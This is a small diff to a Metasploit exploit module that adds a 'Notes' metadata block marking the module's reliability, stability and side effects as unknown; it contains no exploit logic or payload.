@@ -57,6 +57,11 @@ class MetasploitModule < Msf::Exploit::Remote
               stdapi_sys_process_kill
             ]
           }
+        },
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
         }
       )
     )
